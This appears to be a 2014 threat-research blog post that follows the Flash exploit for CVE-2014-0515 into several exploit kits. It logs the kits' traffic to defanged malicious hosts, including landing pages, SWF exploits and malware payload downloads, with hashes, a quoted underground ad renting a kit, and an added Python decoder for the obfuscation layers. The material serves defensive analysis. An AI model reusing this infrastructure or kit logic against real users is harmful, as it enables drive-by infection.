2014-06-07 - Exploit Integration

CVE-2014-0515 (Flash 13.0.0.182 and earlier) integrating Exploit Kits



Discovered by Kaspersky in April in a watering hole attack, used soon after in an operation targeting banking information in Japan/Korea (reported by Symantec), published on Exploit DB at the beginning of May, then seen in malvertising tied to the Brazil 2014 World Cup by SpiderLabs, the code targeting CVE-2014-0515 (Flash 13.0.0.182 and earlier) has found its way into Exploit Kits. I spotted it on 2014-06-05 in the CottonCastle exploit kit (blog post coming). Brad spotted it in Flash EK.

CottonCastle EK:

CVE-2014-0515 exploit in CottonCastle 2014-06-05
See Meet CottonCastle EK (confirmation credit for this CVE goes to Timo Hirvonen)

Flash EK: 2014-06-06 (I decided to use the coder's name)

The Flash EK coder announced the new exploit on the underground on 2014-06-05.

[translated from Russian] "New exploits added. The hit rate ("probiv") has risen significantly. With our VPS and domains - 350 a week (in conventional units, i.e. dollars). With yours - 250. Bitcoins or Paymer check. I don't understand English. We don't accept traffic from the CIS."

Google translated it as:

"Added new sploitov. Risen significantly breaking. With our EPS and domains - uev 350 per week. With your - 250. Chock or check paymer. By not understand English. Cores from the CIS do not accept."

The "breaking" (hit rate) increased by up to 45% of its pre-CVE-2014-0515 value.

CVE-2014-0515 as spotted by Brad in Flash EK
2014-06-06
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/allow.php
200 OK (text/html)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/js/pd.php?id=6376652d323031342d303531352e636f6d  (6376652d323031342d303531352e636f6d is the referer in hex)
200 OK (text/html) http://pastebin.com/HdVf799r

Flash part of the JS detect in Flash EK
2014-06-06


POST http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/json.php
200 OK (text/html) http://pastebin.com/uhTTybKH


Post data to json.php
json.php Flash EK 2014-06-06
After unescape and hex2text : http://pastebin.com/4xZRjJLS
And after one more hex2text : http://pastebin.com/0F9Z2tiW

json.php after multiple hex2bin  Flash EK 2014-06-06


GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/msie.php
200 OK (text/html)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash2014.php
200 OK (text/html) http://pastebin.com/mqXeun1g



GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash0515.php
200 OK (text/html) http://pastebin.com/L6NYY0iW

After some deobfuscation (unescape, hex2text): http://pastebin.com/TjMyS6YW
After one more hex2text : http://pastebin.com/SVGS4yhD

After 3 hex2text : 0515php in Flash EK 2014-06-06
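An added helper, not part of the original post, for the two decoding steps shown above: the id passed to pd.php is the referer hex-encoded, and the landing pages (json.php, flash0515.php) come apart with one unescape followed by repeated hex2text. Function names are mine, and the landing-page blob it builds is a constructed stand-in, not the EK's code.

```python
import binascii
import re

_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")   # JS escape() sequences
_HEXRUN = re.compile(r"[0-9A-Fa-f]{16,}")                      # candidate hex blobs

# Referer id from the captured pd.php URL above: hex of the referring site name.
REFERER_ID = "6376652d323031342d303531352e636f6d"


def js_unescape(s: str) -> str:
    """Python equivalent of JavaScript unescape(): %XX and %uXXXX to characters."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def hex2text(s: str) -> str:
    """Decode a run of hex digits to text (latin-1 maps every byte to a char)."""
    return binascii.unhexlify(s).decode("latin-1")


def peel_layers(blob: str, max_layers: int = 8) -> list:
    """Peel unescape()/hex2text layers until nothing looks encoded any more.

    Returns every layer, outermost first, innermost last. A hex blob embedded in
    JS (var p="6376...";) is taken as the longest even-length hex run; max_layers
    bounds the loop in case a hash-like run in plain text gets decoded by mistake.
    """
    layers, current = [blob], blob
    for _ in range(max_layers):
        if _ESC.search(current):
            current = js_unescape(current)
        else:
            runs = [r for r in _HEXRUN.findall(current) if len(r) % 2 == 0]
            if not runs:
                break
            current = hex2text(max(runs, key=len))
        layers.append(current)
    return layers


def decode_referer_id(hex_id: str) -> str:
    """The ?id= parameter of pd.php is simply the referer hex-encoded."""
    return peel_layers(hex_id)[-1]


# Constructed stand-in for a landing page: a harmless marker string wrapped in
# three hex2text layers plus one escape(), mirroring the chain seen in the capture.
INNER = "document.write('<!-- constructed sample, not EK code -->');"


def js_escape(s: str) -> str:
    """Mimic JavaScript escape(): keep [A-Za-z0-9@*_+-./], else %XX or %uXXXX."""
    return "".join(c if (c.isascii() and c.isalnum()) or c in "@*_+-./" else
                   ("%%%02X" % ord(c) if ord(c) < 256 else "%%u%04X" % ord(c)) for c in s)


def build_sample() -> str:
    s = INNER
    for _ in range(3):
        s = binascii.hexlify(s.encode("latin-1")).decode("ascii")
    return js_escape('var p="%s";eval(hex2text(p));' % s)
```

Running `decode_referer_id(REFERER_ID)` gives the referring site name, and `peel_layers(build_sample())` walks the constructed blob back to INNER in four steps.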



GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash) c49057333ebe34638e7908b43bd23f6c

CVE-2014-0515 DoSWF protected. (won't try to go further)


GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/loadfla0515.php?id=4
200 OK (application/octet-stream)  bde9e91d8a9e19a45c9ebd44393c0194  Glupteba (Thanks Marc-Étienne Léveillé from Eset for identification. MS flagging it as Carberp made me wonder)

Files : 2014-06-06_CVE-2014-0515.zip
You'll find Pcap and additional Data on MalwareTrafficAnalysis

Sweet Orange :
Spotted by Brad on the 12th

CVE-2014-0515 successful pass in Sweet Orange
GET http://img.blueprint-legal .com:16122/systems/mysql/fedora.php?database=3
200 OK (text/html)

GET http://img.blueprint-legal .com:16122/systems/mysql/hxwXHAp
200 OK (application/x-shockwave-flash) 25844d337d3ee13ec411100cb2d2baf1

CVE-2014-0515 in Sweet Orange


GET http://img.lawandmarket .org:16122/cars.php?play=268
200 OK (application/octet-stream) d35d337ff7598bd6dc20c24e3be735bc (Qbot as usual for this user)

Files : Fiddler/Payload/Flash

Nuclear Pack:
2014-06-15
Exploit is inside (for instance: 444d411a353f6bd8209f91555dfd713b).


2014-06-18
After multiple tries without being infected by this exploit on Flash 13.0.0.182, I finally got a "successful" pass. (Thanks Will Metcalf for the Referer)

CVE-2014-0515 positive pass in Nuclear Pack


GET http://f42cb2bfvhf.venueat.gcwsa .org/
200 OK (text/html)

GET http://737570439-1.venueat.gcwsa .org/1403061420.htm
200 OK (text/html)

GET http://737570439-1.venueat.gcwsa .org/1403061420.swf
200 OK (application/x-shockwave-flash) f95006970f34a6ca5bcd0b32b92dd48d

GET http://737570439-1.venueat.gcwsa .org/f/1403061420/7
200 OK (application/octet-stream) aa73557aa6b01045afe1b8b6a4aa0934 (Andromeda v09 rc4: 073e329fc4caff518ffb207eb3ac5859 - calling testotds.mcdir .ru - 91.194.254.180 )

Files : Fiddler/Payload/Flash

Angler EK:
2014-07-03
Modification spotted by EKWatcher. Exploit Identification by Kaspersky.

CVE-2014-0515 successful path in Angler EK
2014-07-03
GET http://reenslavementbuchungsbuero.izyday .com:5900/o0pmoexhbv.php
200 OK (text/html) Landing (Pastebin)

Contains some AV (Kaspersky and TrendMicro) detection :

AV detection (Function0: http://pastebin.com/hjH8ijuA)


SilverLight /Flash trigger

Modification spotted by EKWatcher (Function1: http://pastebin.com/H2DdDeVf)


And impossible path :

Impossible Path
( Function1 : http://pastebin.com/H2DdDeVf )

[OT] Silverlight Calls :  Function2  http://pastebin.com/Vd869rDX [/OT]

Flash Call (function3)

Flash Calls (Function3: http://pastebin.com/maY5Wz1X)
[OT] PluginDetect/Java calls: Function4 http://pastebin.com/VbUsu2pv [/OT]



GET http://reenslavementbuchungsbuero.izyday .com:5900/9C52KmONbd2yuWAu5h6nA_qVLxrslXn927DBuIPEo2Pog7IUkVQt04rmOPmow_rb
200 OK (application/x-shockwave-flash) 85db431821dfec5d5d404b839c98d333


After decryption (Kaspersky's work)
Piece of CVE-2014-0515 in decrypted flash from Angler EK

GET http://reenslavementbuchungsbuero.izyday .com:5900/sVUXbUAgdGMB6xjbl128LfXoLjZ37iyD34sGV24h7-9RKadZHRBKohwCwk5FHCfc
200 OK (application/octet-stream) (Reveton Ransomware)

Files : Fiddler/Flash

Styx : 2014-08-22

Update coming shortly.


Read more :
CVE-2014-0515 exploit from FlashPack EK - Brad - Malware-Traffic-Analysis
CVE-2014-0515 Goes to Brazil for World Cup 2014 - Arseny Levin - SpiderLabs - 2014-06-03
Recent Exploit for Adobe Flash Vulnerability Targeting Users in Japan for Financial Information - Joji Hamada - Symantec - 2014-05-30
Technical Analysis of CVE-2014-0515 Adobe Flash Player Exploit - Matt_Oh - HP - 2014-05-23
Adobe Flash Player Shader Buffer Overflow Exploit - ExploitDB - 2014-05-09
New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks - Vyacheslav Zakorzhevsky - Kaspersky - 2014-04-28